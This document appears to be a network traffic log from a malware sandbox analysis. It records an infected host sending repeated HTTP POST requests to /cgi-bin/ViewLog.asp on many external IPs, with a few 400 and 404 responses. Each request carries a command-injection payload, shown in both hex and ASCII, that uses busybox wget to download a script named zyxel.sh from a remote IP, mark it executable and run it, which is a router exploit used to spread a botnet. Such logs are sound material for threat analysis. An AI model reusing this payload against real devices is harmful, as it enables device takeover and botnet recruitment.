Feb 14, 2024 09:30:20.325779915 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:20.952651024 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:22.200601101 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:24.664669991 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:29.784514904 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:39.768135071 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:59.735505104 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:40.694504023 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
617	192.168.2.15	43532	95.181.244.236	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:20.347364902 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
618	192.168.2.15	46874	31.136.221.69	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:20.525424004 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:21.144638062 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:22.392693043 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:24.920564890 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:30.040606022 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:40.024272919 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:59.735516071 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:40.694444895 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
619	192.168.2.15	36572	94.130.36.39	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:20.533004045 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:20.743199110 CET	490	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 14 Feb 2024 08:30:20 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
620	192.168.2.15	48416	31.136.91.30	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:20.565359116 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:21.240663052 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:22.584635973 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:25.432552099 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:30.808371067 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:41.560131073 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:03.835382938 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:46.838308096 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
621	192.168.2.15	32836	62.29.0.28	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:20.769524097 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
622	192.168.2.15	49436	94.123.134.153	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:20.769710064 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
623	192.168.2.15	40458	62.29.31.73	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:20.772378922 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
624	192.168.2.15	60328	94.121.113.92	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:20.772923946 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
625	192.168.2.15	39894	94.228.190.58	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:21.094347000 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:21.300123930 CET	484	IN	HTTP/1.1 404 Not Found Cache-Control: must-revalidate,no-cache,no-store Content-Type: text/html; charset=ISO-8859-1 Content-Length: 297 Server: Jetty(9.2.25.v20180606) Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 2f 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 32 3e 48 54 54 50 20 45 52 52 4f 52 3a 20 34 30 34 3c 2f 68 32 3e 0a 3c 70 3e 50 72 6f 62 6c 65 6d 20 61 63 63 65 73 73 69 6e 67 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 2e 20 52 65 61 73 6f 6e 3a 0a 3c 70 72 65 3e 20 20 20 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 72 65 3e 3c 2f 70 3e 0a 3c 68 72 20 2f 3e 3c 69 3e 3c 73 6d 61 6c 6c 3e 50 6f 77 65 72 65 64 20 62 79 20 4a 65 74 74 79 3a 2f 2f 3c 2f 73 6d 61 6c 6c 3e 3c 2f 69 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html;charset=ISO-8859-1"/><title>Error 404 </title></head><body><h2>HTTP ERROR: 404</h2><p>Problem accessing /cgi-bin/ViewLog.asp. Reason:<pre> Not Found</pre></p><hr /><i><small>Powered by Jetty://</small></i></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
626	192.168.2.15	53612	88.221.34.18	80

Timestamp	Bytes transferred	Direction	Data
